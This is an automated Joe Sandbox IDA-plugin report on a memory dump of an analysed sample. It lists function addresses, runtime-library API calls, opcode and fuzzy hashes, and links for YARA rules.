                                                                                                                                                                                                                                  • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                  • Opcode ID: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a325a68ccf4bdc99371d265bda0e11596e817bf0efbd4651ddb8449f53c4424
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00414A4A Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
                                                                                                                                                                                                                                    • Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 00414CF4
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D65
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414D7E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB0
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DB9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00414DC5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
                                                                                                                                                                                                                                  • Opcode ID: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction ID: 4e3572d10ca72b0cc8c55f95b2e81b49ef67830968b65e4bef4c2f16e2eaf972
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 867fa0ef6cc85311a84fab34ced728f8fa705af9a4dc30a667b1e83018fa5afb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71B11875A012199BDB24DF18D884BEEB7B4FF88314F6045AAE809A7350E735AE91CF44
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041673F Relevance: 12.2, APIs: 8, Instructions: 216COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,0040F850,0040F850,?,?,?,00416990,00000001,00000001,F5E85006), ref: 00416799
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004167D1
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00416990,00000001,00000001,F5E85006,?,?,?), ref: 0041681F
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 004168B6
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00416919
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416926
                                                                                                                                                                                                                                    • Part of subcall function 00417A45: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B4CD,00000000,?,00410DE7,?,00000008,?,00411992,?,?,?), ref: 00417A77
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 0041692F
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00416954
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3864826663-0
                                                                                                                                                                                                                                  • Opcode ID: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction ID: 26764a85889f0707fbffed2f2a276afb84307330fa482a04e449b3980190c86e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b8827a1c079bf13245f6a2b5397cba4bf80c3eb245bf2fea745f98744adb5078
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9C51D4B2610216ABDB259F65CC41EFF7BA9EF44754F16462EFD04D6280DB38DC80C6A8
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041EF07 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 269201875-0
                                                                                                                                                                                                                                  • Opcode ID: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction ID: 68ef0a4baed83bf313a212b59b327df333dc31b97233ae496646a1f671aa2022
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7da7e4f938cfb7f53f4ee3042c9ba99eb24c12608d8937e14d039355d897170d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9A61B171900205AFDB20DF65C841BEABBF4EF48710F1441BBED44EB252E734AD868B98
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00415A13 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,00416188,?,?,?,?,?,?), ref: 00415A55
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AD0
                                                                                                                                                                                                                                  • __fassign.LIBCMT ref: 00415AEB
                                                                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,?,00000005,00000000,00000000), ref: 00415B11
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000000,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B30
                                                                                                                                                                                                                                  • WriteFile.KERNEL32(?,?,00000001,00416188,00000000,?,?,?,?,?,?,?,?,?,00416188,?), ref: 00415B69
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1324828854-0
                                                                                                                                                                                                                                  • Opcode ID: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction ID: 97884a52693caeb5a5c3a9d5f4bc50bcec63f9a7d6aba0d10f38b6cf3ce1f43d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ae999e74c312fbf0247888fa3a2934b9317c3a2d6cc292263a5c2c0b7bdde97
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C051F1B1A05608DFDB10CFA8D881BEEBBF4EF49310F14416BE955E3291D774A981CB68
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C7DB
                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 0040C7E3
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C871
                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0040C89C
                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 0040C8F1
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                  • String ID: csm
                                                                                                                                                                                                                                  • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                  • Opcode ID: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction ID: 4609d27efc8d7a17fa762f128460d8fd5adcc0840ed3b149ea1d44a8c589526f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7022c009514565bc7e03d4d9ba72283da9068d18157a86314c5ddd6e7a3a15ef
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F418235E00208DBCB10EF69C880A9EBBB5AF45315F14C27BE8156B3D1D7399945CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004228D8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction ID: eb3437e7256d6e9500263c5b78cb76159e7e032ed684a14598ba9abdd6a69119
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc80b842ec2fa87e1f3d7b13bcdad74e1acd085aed55d4be6a2af7e8e8dba1d6
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 85112BB27081297FDB202F739D04AAF3A5CDF85734B51022EBC15D6241DEBC88818669
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041F3DC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041F123: _free.LIBCMT ref: 0041F14C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F42A
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                    • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F435
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F440
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F494
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F49F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4AA
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0041F4B5
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction ID: 6442e121d4515539895166ad143442a8d84c52f7901faf26133e6203624009ae
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f5f9210e66ecb300b20def578b7e57a4e9d6a14b2db5b2a678dd4c5c189928c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 79113D71540B14FADA20BBF2DC07FCB77DCAF4470CF40482EBA9A66052DA7DB9894654
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 0040418E
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 004041B4
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 004041BD
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 004041EE
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040422A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction ID: 0d98e69d0512f29499375b1b223a36d4520ec3994eac90c636b6988e9ad91f04
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7311C472A041249BCB04EBA5DC46AEE7B74EF84358F10457FF911B72D1DB38AA01C7A9
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004033EF
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403415
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 0040341E
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040344F
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0040348B
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction ID: b08fc69a2d58a520d61ed45628bf7838f6025f71e81aad9ede0327bacf9a49bc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8F11B2329002249BCB05EFA4C845AEE7B74EF84319F10457EF811772D1DB789A00CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 004035FA
                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00403609
                                                                                                                                                                                                                                  • int.LIBCPMT ref: 00403620
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
                                                                                                                                                                                                                                    • Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343
                                                                                                                                                                                                                                  • std::locale::_Getfacet.LIBCPMT ref: 00403629
                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 0040365A
                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
                                                                                                                                                                                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00403696
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1202896665-0
                                                                                                                                                                                                                                  • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction ID: 35ba7fbacb3ba011adbce412d2c2d1e287e189574cae76d7885ddda8e317074f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F11C432A001289BCB14EFA5C845AEE7B74AF84319F10457FF811773D1DB389A04CB99
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00411A77 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: __cftoe
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 4189289331-0
                                                                                                                                                                                                                                  • Opcode ID: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction ID: 718bfb1be64fddbb13d287cf5bb67825c1c0e481ba6d94f2ea4f00e94f797b17
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d20e9699dbc1971cb5a568552f769a18d013c3a1758ac9be0fb612f4fcf7e9e2
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5851FB32504205ABDF249B598C41EEF77A9AF49364F10421FF915962A1FB3DE9C0C66C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0040C9B5 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040C9AC,0040A25B), ref: 0040C9C3
                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D1
                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9EA
                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,?,0040C9AC,0040A25B), ref: 0040CA3C
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3852720340-0
                                                                                                                                                                                                                                  • Opcode ID: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction ID: 4d2dab335d40ef71c1f126db0958835d547db160ba3e5df8986dc94b5f1501a5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ec8e2a5af9cecc2b331547669bdca73f67e442984506367ed98352285f45261
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5001C072609619AEE63857B5BCC5B2B3665DB01378720033FF220B02F1EF694C06558C
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000004.00000002.2243537474.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000004.00000002.2243537474.000000000043E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_400000_VtmtVe55Jwcf3rOGIU1yezyh.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                                                                                                  • Opcode ID: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction ID: ed1cfbe94671cc1e241a5e305b234748cf7dab698c9013e935629a888f8688e1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 998e373a8b585b2683437369c8faaac4270011fdab842cf86591235bf0544559
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CF0A431784B1066C6227B36BC0AFDF26299FC1765B27062FF518A2291EF2CD882815D
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042E2F0,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
